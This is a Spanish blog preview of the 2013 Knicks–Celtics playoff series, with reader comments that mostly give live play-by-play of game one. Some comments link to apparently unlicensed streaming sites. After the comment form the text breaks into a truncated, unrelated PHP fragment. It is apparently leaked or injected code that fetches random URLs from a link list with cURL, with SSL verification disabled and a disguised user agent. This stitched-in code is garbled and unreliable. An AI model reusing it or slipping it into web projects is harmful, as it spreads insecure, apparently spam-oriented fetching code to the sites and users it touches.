Previa New York Knicks – Boston Celtics

19 de April de 2013 por TheDeerHunter

Clásico fundamental tanto de la Conferencia Este como de la liga que en las últimas décadas ha sido algo menos frecuente pero que en su día era el pan nuestro de cada día en los cruces y duelo de máxima rivalidad, trascendiendo incluso lo deportivo. Los Celtics solían amargarle la existencia al aficionado del Madison con su sádica eficacia habitual, aunque de vez en cuando surgía alguna gran escuadra knickerbocker que lograba cobrarse revancha, incluso enterrando en alguna ocasión alguno de los ciclos ganadores de los del trébol.

Se dan varias circunstancias que parecen indicar que ésta será una de esas ocasiones en las que los Knicks hacen ajuste de cuentas. Éstos han jugado muy bien durante todo el curso a ambos lados de la cancha, han firmado su mejor campaña desde la primera de Jeff Van Gundy y tienen una mega-estrella como Carmelo Anthony en el momento más dulce de su carrera. Por el contrario, los Celtics perdieron a Rondo, parecen cada día más cascados para seguir compitiendo y firman, con diferencia, la peor campaña desde que se formó el proyecto vigente. De todas maneras, si algo nos ha enseñado la historia de la franquicia así como también los acontecimientos recientes es que no van a regalar nada y que su hábitat natural son los cruces a cara de perro. 

Claves de la eliminatoria:

  • Duelo de treses: Quizá algún día especulemos con duelos imaginarios entre Pierce y Melo en sus teóricos momentos ideales. A sus 35 añitos, Pierce es capaz muchas veces de echarse el equipo a la espalda y dar la vuelta al marcador pero en la flor de su carrera Carmelo es uno de los jugadores más determinantes del mundo. Es su momento.
  • Duelo de bancos: Hemos podido constatar que Mike Woodson sabe hacer muy bien su trabajo. Ahora le toca aspirar al cum laude, superando al que para muchos es el mejor técnico en activo, Doc Rivers.
  • Movimiento de balón: Si en algo superan claramente los Celtics a su rival de esta serie es en la distribución, aún sin Rondo. Para superar la pegajosa defensa diseñada por Woodson deberán hacer valer este factor.
  • Ganar en el Madison: Los Celtics son el peor equipo foráneo de todos los clasificados y esta salida es una de las más hostiles que existen para ellos. Contamos con que el Garden puede dar la vuelta a algunas eliminatorias pero en esta ocasión necesitan rascar algo fuera.

Pronóstico: 4-1 para los Knicks.

Comenta

45 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Bueno pues empezamos el análisis de los Playoffs con la eliminatoria para mí más interesante del Este y la que más me va a tener pendiente ya que juega mi equipo.
    En principio vista la temporada regular de ambos, debería ser una serie sin historia y clara para los Knicks…. yo me inclino a pensar que no va a ser así.
    Por los Knicks sin duda se espera a un Carmelo sobresaliente al mismo nivel que ha mantenido durante toda la temporada en la que ha ganado el título de máximo anotador y es candidato a MVP. Los Celtics tienen jugadores para emparejarlos y defenderle correctamente. Tanto Pierce como Green pueden medirse físicamente a Melo y será clave que le bajen sus porcentajes, le hagan perder balones y controlen sus rachas. Si lo consiguen los Celtics abran abiero las puertas a unas series de lo más igualadas
    Fuera de Carmelo, el otra gran arma ofensiva de los Knicks es su juego exterior y más en concreto sus triples y justo ahí los Celtics también tienen algo que decir. Si Garnett está bien y puede encargarse de la defensa de la pintura, los exteriores de Boston son grandes defensores y Bradley y Lee deben hacer sudar tinta a JR Smith, Kidd y compañía para conseguir los triples que les son tan necesarios.
    Quizás el mayor problema de los Celtics esté al otro lado, al atacar a los Knicks. Sin un base puro y con Pierce y Garnett ya con sus años será fundamental que Green, Bass, Terry y Bradley sumen puntos con asiduidad si quieren tener opciones. Un buen movimiento de balón e intentar aprovechar las transiciones serán claves ya que parece difícil que Garnett pueda superar claramente a Chandler.
    Por experiencia, muy igualados si en un lado están Melo, Kidd o Chandler en el otro tenemos a Pierce, Garnett o Terry. Veremos qué sorpresas nos prepara Doc Rivers para la eliminatoria y si los Knicks son realmente tan fuertes psicológicamente ya que sus dos mejores anotadores (Melo y JR) están todavía bajo alguna sospecha en PO.
    Creo que será una serie muy bonita entre dos equipos históricos y con dos pabellones que son probablemente los más míticos de la NBA junto al de los Lakers.
    Yo creo que mis verdes van a dar guerra y caerán con las botas puestas forzando un séptimo partido en el Madison pero como logren sacar uno de los dos primeros en New York, podrían tener incluso opciones de dar la sorpresa.

      Citar

  2. Jose Luis dice:
    #2

    Bueno muchas ganas de esta eliminatoria, aunque esta vez veo bastante favoritos a los Knicks para llevársela, no arrasando, pero sí que no creo que Boston gane más de 2 partidos. Complicado ganar en el Garden, seguro, pero los Celtics tienen a veces lagunas ofensivas duraderas. En cuanto a la defensa exterior, Bradley y Lee son buenos defensores contra el balón, no sé si podrán defender muy bien a tiradores con buena verticalidad y elevación como Smith, aunque Doc Rivers tendrá mucho que decir en este tipo de defensa. La clave es que drible antes de lanzar, baja sus porcentajes a la mitad.

    Green lo veo un buen emparejamiento con Melo, no así Pierce, la verdad… no le veo capaz de parar a Melo.Quizá si al inicio de partido, pero conforme vayan avanzando los minutos será Green quien le defienda para que Pierce guarde energías para los minutos finales.

      Citar

  3. Sancho88 dice:
    #3

    4-2 porque es lo que he puesto en la porra. Boston amarrará los dos de casa seguramente por orgullo (lo máximo que puede obtener), pero en el global de la eliminatoria no tienen armas suficientes para plantar cara al, como bien dices Deer, el mejor Carmelo de su carrera. Pierce puede lucirse y lo hará, pero no se puede comparar a Carmelo en estos momentos, Garnett está claramente en declive y ha dado otro pasito atrás con respecto a su gran año pasado (aunque sigue siendo un jugador sublime y lo demostrará también), y sin Rondo, es imposible que tengan opciones. El green pride saldrá, lo llevan en los genes, pero esta vez Nueva York es muy superior en todas las facetas. Su ‘small ball’ es de lo mejor en toda la liga, y Chandler por dentro es uno de los mejores centers. Además, la defensa planteada por Woodson puede poner en peligro el gran movimiento de balón que plantea Doc. No sé, NY es muy muy favorita, y si acaso, yo añadiría un factor en contra de los Knicks: COMPLEJO (de inferioridad, de cagarlas en PO), frente al ORGULLO celtic, que con nada, se crecen… ese factor puede llegar a dar mucho juego en una eliminatoria, que, por lo demás, está desequilibradísima.

      Citar

  4. rumbero dice:
    #4

    Va que en breve empieza esto.
    Yo me niego a creer que los verdes lo van a poner fácil aunque sobre el papel los Knicks deberían ganar bien visto el nivel con el que llegan. 4-3 en la porra. A Carmelo parece difícil poder pararlo así que habrá que ver que tal la defensa de perímetro para que no los acribillen a triples, si no lo van a tener imposible. A seguir J. Green que viene jugando bien y debería ser importante en ataque y en defensa…porque a Terry no se le espera no?

      Citar

  5. Jose Luis dice:
    #5

    Vamos que empieza esto chicos!

    http://eventosendirecto.blogspot.com.es/2013/02/canal-deportes-hd-live-television.html

    Ahí tenéis. Desactiváis el adblock o lo que tengáis para los anuncios y a verlo en español!

      Citar

  6. Jose Luis dice:
    #6

    Felton, Shumpert, Copeland, Anthony Chandler, no hay doble base

    Bradley, Pierce, Green, Bass, Garnett, no hay alero de 4 abierto.

    Abre el partido con canasta Garnett. Bradley machaca tras asistencia de Pierce.

    Veremos si Shumpert puede ser defensor de élite ante Pierce, ahora mismo están emparejados en defensa. Anota Anthony ahora.

      Citar

  7. Jose Luis dice:
    #7

    Se me han encriptado los links 🙁

    ahora lo veo aqui, pero en inglés claro.

    http://www.firstrow1.eu/watch/182068/1/watch-boston-celtics-vs-new-york-knicks.html

      Citar

  8. Jose Luis dice:
    #8

    Han empezado muy bien los Knicks, bueno, Carmelo, 4-4 en TC, 2-2 en T3, 10 puntos. Anota ahora Bradley desde la esquinita tras un gran movimiento de balón. Como sufren ahí los Knicks

    Los Celtics llevando mucho a Pierce al poste con Shumpert, donde le está sacando ventaja.

    Le han pitado una falta a Bradley ahora… que la ha pitado Felton vamos, la han pitado los árbitros cuando el balón ya estaba dentro, y el tiro era de 6 metros… 2+1 por tanto Felton, 9-15.

      Citar

  9. Jose Luis dice:
    #9

    Garnett haciendo un goaltending a lo Javale. Nova a sufrir nada Pierce con JR Smith… puf.

    Técnica a Chandler por empujar a Garnett tras la falta. estos árbitros no quieren guerra.

    No sé… pero con el juego exterior de Boston… Lee, Terry, Bradley, Pierce, Green… casi que le convendría jugar estilo NY con 4 pequeños. Es que ver a Pierce con Smith… y ahora Bradley defendiendo 2 posesiones consecutivas a Anthony, 2+1 y 2ª falta Bradley.

      Citar

  10. Jose Luis dice:
    #10

    Quizá meter a Pierce en el poste sea una forma de no cansarle en exceso, aprovechando su tamaño frente a Shumpert-Smith y su capacidad de pase.

    Se han pitado ya 3 faltas en ataque. Puffff Smith hace lo que quiere con Jordan Crawford y machaca el aro de Boston tras robarle un balón a Green en la defensa anterior. Ahora canasta y falta sobre Pierce, time out, Celtics 21-24 Knicks

      Citar

  11. MagicJohnson32 dice:
    #11

    Vaya matazo se acaba de marcar JR, buf. Los Celtics aguantan pese a todo.

      Citar

  12. Jose Luis dice:
    #12

    Terry vs Kidd, bonito duelo 😀

    Pierce sigue abusando del juego de espaldas a la canasta, consiguiendo tiros libres. Empata el partido The Truth.

    Falla Smith el lanzamiento tras drible (baja muchísimo sus porcentajes en estos tiros comparado con los lanzamientos en estático) y anota Bass tras rebote ofensivo. Tapona Kenyon Martin a un Jason Terry que no se donde iba con ese intento de mate, y anota Martin. Falla Anthony la última posesión de Knicks y en transición, Green anota triple sobre la bocina, tras la nula defensa (desde la canasta Celtic vamos) de Carmelo Anthony. Tuvo 7 segundos para volver a defender. 29-26 al final del primer cuarto.

      Citar

  13. Jose Luis dice:
    #13

    Carmelo después de su 4-4, lleva 1-7…, 3 puntos en los últimos 8 minutos.

      Citar

  14. MagicJohnson32 dice:
    #14

    El factor Jeff Green es fundamental para que los Celtics tengan posibilidades. De momento, marcado diferencias.

      Citar

  15. Jose Luis dice:
    #15

    Vaya desequilibrio de defensa Knickerbocker… un simple corte a principio de posesión deja a Bradley sólo en la esquina y a Kidd con Green, quien tras un pequeño drible le casca un triplazo en la cara… a la siguiente, Kidd triple abierto, air-ball.

    Le cuesta moverse a la defensa delos Knicks. Ahora Kidd enlaza dos triples consecutivos y empata el partido. Otro triple desde la esquina absolutamente solos los Celtics, aunque hasta ahora no lo han aprovechado… vaya baloncito de Terry a Garnett en la zona con tres tíos encima… pérdida evidentemente, y triple en transición de Shumpert para enlazar tres triples consecutivos…

    Si los Celtics tiran tantos triples, esos rebotes ofensivos abiertos dejarán correr mucho a los Knicks, y eso es un problema para los verdes. o dejan a alguien a la altura del tiro libre para ayudar en el rebote al pívot, o sufrirán mucho la transición de los Knicks con jugadores jóvenes y físicos y una perfecta lanzadera como es Kidd.

      Citar

  16. Jose Luis dice:
    #16

    No me parece nada bien la programación horaria de las dos primeras jornadas de PO. Si hay una prórroga te pierdes un partido u otro. Antes había 3 horas de diferencia y si había una prórroga podías verla acabar.

    Tapón de Felton a Bradley, quien ha entrado muy muy mal al partido. Puf la que le están dando a Shumpert al poste le pille quién le pille.

    @Esteban: Shumpert no puede defender a ningún alero que mida más de 2 metros. Carmelo se va a comer la defensa sobre Pierce, George, James, etc. Y soltaron a Brewer…

    7 pérdidas Boston, otra cosa que no se pueden permitir, como resultado casi anota Felton un mate en transición.

    Muy bien Jeff Green, la verdad. Muy buen partido. Tiros libres ahora sobre él. Partido de anotación alta, supongo que las defensas se ajustarán en la segunda parte. Pierce ahora sobre Felton, más sufrimiento para sus piernas por la movilidad del pequeño base. Y Bass sobre Anthony, bueno… le ha parado antes, ahora Anthony ha sacado dos faltas consecutivas, una fue de tiro contra Garnett, a mí no me lo pareció.

    Eh! Garnett acaba de hacer un Amir Johnson! Lo de querer coger la pelota entre tiros libres, y se la han dado… el árbitro aquel le tenía tirria a Amir, normal que este le tirase el protector bucal tras expulsarle. http://www.youtube.com/watch?v=9Vo67QPaNLU

    Ahora Anthony se la lía a Bass reverso incluido y Bradley falla bandeja, canasta de Smith, el Madison se viene arriba. ¿Perdón? ¿eso fue un mate de Garnett? 44-44 tras corte a canasta desde el centro y bandeja de Bradley a falta de 4:30 minutos aún. Triple al tablero de Kidd que no entra y bandeja de Bradley da la ventaja a los Celtics antes del Time Out.

      Citar

  17. Jose Luis dice:
    #17

    Qué mal está Carmelo, ahora Bass le fuerza a una pérdida lateral. Joder Bradley, no sabe como pasar un balón al poste por encima del defensor, FELTON se la ha robado dos veces. Ohhh que robo ahora de Courtney Lee, y le saca la falta a Felton, dos tiros libres.

      Citar

  18. Jose Luis dice:
    #18

    Threeeee JR Smith, y otra pérdida “aérea” de Bradley

      Citar

  19. Jose Luis dice:
    #19

    Cada posteo de Pierce requiere doble marca, y Bradley está leyendo perfectamente esa posibiidad de corte hacia el aro desde el centro (esto será cosa de Doc Rivers fijo).

      Citar

  20. Jose Luis dice:
    #20

    Melo, o espabilas, o te nombrarán persona non grata en el Madison. Tras otro fallo suyo sobre Bass, Green aprovecha la transición y saca 2+1 a Copeland.

      Citar

  21. Jose Luis dice:
    #21

    Otra isolation con Bass y otra pérdida de Anthony… vergüenza debe estar pasando. Bandeja de Pierce en transición, estos Celtics no temen correr. Ahora sí le saca la falta Anthony a Bass, dudosa para mí, se la han pitado porque es Anthony y está en el Madison. Anota los dos. Bradley deja pasar un lanzamiento cómodo y falla Garnett, demasiados aclarados para Anthony, bueno, ni siquiera son aclarados, él decide e intenta guisárselas y comérselas… por favor, que mal Carmelo. Parece mentira que siga intentándolo. Otras dos jugadas 1 vs 1 fallidas por él, Pierce no acierta el triple final y nos vamos al descanso .Celtics 53-49 Knicks

    20 puntitos Jeff Green, ojito.

      Citar

  22. MagicJohnson32 dice:
    #22

    Los Celtics han estudiado bien la defensa de los Knicks, saben por dónde y cómo atacarla, y están quedando en evidencia los déficits de NY. Melo tiene que apretar atrás y contenerse un poco en ataque, donde a los Knicks les está faltando circulación. Partido bonito de todas formas.

      Citar

  23. Jose Luis dice:
    #23

    Pobres Celtics. Big-three en 2008 y anillo, 2009 lesión Garnett, 2010 lesión Perkins, 2012 lesiones Allen, 2013 lesión Rondo.

    Otros dos tiros de Anthony en las dos primeras posesiones de Knicks en el 2º tiempo. Falla Pierce, falla Green, falla Shumpert, y anota Anthony de 3 tras pasos claros de Copeland al caer. Bien encerrado ahora Pierce en el poste, se dejó caer mucho hacia adentro, y en la transición Shumpert perdió el balón. 3 puntos en los 3 primeros minutos tras un air-ball de Pierce. Anota Smith tras drible, Celtics 53-54 Knicks.

      Citar

  24. Jose Luis dice:
    #24

    Bradley ha mejorado mucho en el partido en cuanto se ha librado de la distribución y se ha puesto a anotar. Otra recuperación de Bradley y falta de Chandler sobre un Jeff Green que ve una autopista hacia el aro en cada transición céltica.

    Otro fallo tras bote de Smith, 1 de 3 en estos lanzamientos, 6-9 total en el partido. Anthony de 3, 4-4 en triples empata el partido. Muy bien leyendo también las penetraciones de los Knicks, en especial Pierce quien ya ha provocado 3 faltas en ataque.

      Citar

  25. Jose Luis dice:
    #25

    6 faltas en ataque ya pitadas en este partido… extraño. Otro forcejeo con Green pitado a favor de Anthony, quién falla ahora un tiro abierto de 20 pies. Falta de Kidd ahora sobre Pierce, los dos dentro y 59-57.

      Citar

  26. Jose Luis dice:
    #26

    Triple de Felton ahora… me pareció falta en ataque de Melo, fallan ahora los Celtics. Mucho mejor los Knicks con dos bases en pista, revienta Kenyon Martin el aro de los Celtics. Dura falta de Melo a Lee ahora, anota los dos tiros libres. Otra recuperación de Bradley sobre Smith, y ahora anota de 2, 15 puntos para él, que está muy entonado ahora, parece que ya se le han pasado los nervios. Otro aclarado para Anthony, Bass le frena, 8-21 en tiros… puf! vaya air-ball de 5 metros de Pierce, sin oposición… el defensor se quedó atrás tras la finta.

      Citar

  27. melo15 dice:
    #27

    Me estoy poniendo bastante nervioso.
    No entiendo porque pero contra los Knicks todos los equipos juegan mucho mejor. De momento bastante empatado y eso no es tan malo para New York porque los Celtics creo que se iran cansando y Melo en el 4 resuelve.
    PD: No creeis que los Knicks juegan muchas isolations? Creo que Felton o Kidd deberian subir el balon y no JR o Carmelo.

      Citar

  28. Jose Luis dice:
    #28

    curioso, -13 con Kidd en pista, la verdad es que sufren mucho en defensa cuando juega él, y -6 con Anthony. Por los Celtics solo 3 jugadores desde el banco, y solo 4 puntos de Lee aportan los suplentes.

      Citar

  29. Jose Luis dice:
    #29

    Carmelo está queriendo asumir demasiado protagonismo, jugando isolations una y otra vez, cuando le da la gana, parando mucho el ritmo del equipo y desconectando a los jugadores.

    En su racha de 6 partidos por encima de 30 puntos, fue más un jugador de catch and shoot que de isolations… parece que no se ha dado cuenta.

    Cada vez que Pierce penetra o va al poste (lo cual hace con mucha frecuencia al superar a sus defensores Shumpert, Smith, Kidd fácilmente) saca algo. 8 tiros libres y 7 asistencias para él. Otro fallo de Anthony desde el tiro libre, totalmente solo y con tiempo tras rebote ofensivo de Martin. Anotan los Celtics, falla Smith triple y bandeja, y de nuevo bola Celtics. Pierce for threeeeee, este no falla, 7 arriba los Celtics, mayor diferencia en el partido, Smith desperdicia otro triple, falla ahora de tres Pierce… y falta de Courtney Lee sobre Smith. 70-63.

      Citar

  30. Jose Luis dice:
    #30

    Anotó ahora Anthony un tiro complicado sobre Jeff Green, se complica demasiado Carmelo. Tiros libres regalados a Kidd. Quedan 15 segundos de cuarto, veremos que prepara Doc. 70-67. Sube la bola Green, 5, 4, triple de Green, in and out. Final del 3er cuarto

      Citar

  31. Jose Luis dice:
    #31

    Canastón de Felton para abrir el cuarto. Garnett no está nada acertado, 3-11 en tiros. Campo atrás no pitado a Kidd, clarísimo tras recuperar un balón que perdió Smith. Triple de Terry que no va, uf vaya defensita céltica concediendo rebotes ofensivos… buen intento de recuperación Lee, pero no puedes meter ese balón para adentro así… 8 puntos 7 rebotes Kenyon Martin, 70-72.

      Citar

  32. Jose Luis dice:
    #32

    Muchos problemas para anotar los Celtics ahora, sin Pierce en pista para distribuir. Entra ahora, falla triple Terry, falla triple Anthony, y falta de Martin sobre Pierce.

      Citar

  33. Jose Luis dice:
    #33

    Ahora si Garnett con su doble amago de espaldas al aro. Anthony de dos en catch and shoot, dentro. Donde ibas Bradley, y vaya falta de nuevo sobre Bradley, que le están dando por todos lados y pitando muy poquito. Kidd de tres falla, se equivoca Pierce desde dentro, pues estaba con gran ventaja sobre Felton y abrió para Green quién falló de tres.Ahora sí Anthony desde el drible, se deshizo bien de Green. Pierce sobre Kidd de nuevo, 74-76.

      Citar

  34. Jose Luis dice:
    #34

    2+1 ahora de Smith en penetración, bonita bandeja tras la falta de Garnett, se le escapó a Bradley, quién salió a contrapié al haber balanceado demasiado hacia el otro lado.

      Citar

  35. melo15 dice:
    #35

    Bueno parece que New York esta empezando a poner la directa y vamos a ver como acaba pero tengo buenas vibraciones.
    Ademas es muy bueno que JR y Carmelo se enchufen para el final.
    PARTIDADAZO de Felton, que equilibrio le da al equipo!!

      Citar

  36. Jose Luis dice:
    #36

    Pasos de Green y fallo de Smith tras drible. Los Celtics 4 puntos en 7 minutos, pérdida y dos tiros para Felton.

      Citar

  37. Jose Luis dice:
    #37

    Anota solo uno, canasta de Pierce desde el tiro libre. 76-79. Fallo de Smith pero buena recuperación suya en transición defensiva. Fallan sendos triples Felton y Pierce. También falla Smith, otra pérdida Boston y Anthony al contraataque pone el +5 para los Knicks

      Citar

  38. Jose Luis dice:
    #38

    Que fallones los Celtics, tiros abiertos, sencillos, y fallando… 6 puntos en 11 minutos. Los Knicks no se verán en otra. Anthony de 2, 7 arriba a falta de 1:21. Partido finiquitado para mí.

      Citar

  39. Jose Luis dice:
    #39

    Los árbitros muy caseros, más de lo normal en PO, pero bueno. Boston ha fallado mucho en el último cuarto, no sé si ha sido falta de frescura o qué.

      Citar

  40. Jose Luis dice:
    #40

    Anotó dos tiros libres Green pero Martin da la puntilla tras un intento de doble marca de los Celtics sobre Anthony. 78-85, 40 segundos.

      Citar

  41. MagicJohnson32 dice:
    #41

    El último cuarto de los Celtics ha sido para llorar. Si mis cuentas no fallan, 8 puntos y 8 pérdidas de balón.

      Citar

  42. Jose Luis dice:
    #42

    Pues nada, error en la última jugada y victoria Knicks. Muy muy mal los Celtics en el último cuarto, 18-8 de parcial para los Knicks. Las defensas se ajustaron y los Celtics evidenciaron que les falta un anotador que dé la talla fuera de Pierce y Green-Garnett, pero difícilmente estos dos juntos pasarán de 40 puntos. De todas formas, los Knicks no se verán en otra igual, 5-20 los Celtics en triples y jugando un tan tan malísimo último cuarto, si ni ganaban era para matarlos.

      Citar

  43. Jose Luis dice:
    #43

    El Warriors @ Nuggets no me interesa, así que nos leemos si acaso en el Bulls @ Nets

    PD: 25 puntos en la segunda parte Boston… pf

      Citar

  44. MagicJohnson32 dice:
    #44

    Un dato que he puesto en twitter:

    Balance del banquillo de los Celtics (C. Lee, J. Terry, J. Crawford): 0/7 FG, 4/4 FT, 6 rebotes, 0 asistencias, 1 robo, 1 pérdida, 1 tapón.

      Citar

  45. rumbero dice:
    #45

    Ese último cuarto de los Celtics es de lo peorcito que les he visto en mucho tiempo. Esa estadistica del banquillo es demoledora. Especialmente sangrante el caso de Terry al que se fichó para partpidos asi. Veremos como sigue la serie pero si los verdes no solventan esas lagunas ofensivas se puede acabar la serie rapido

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>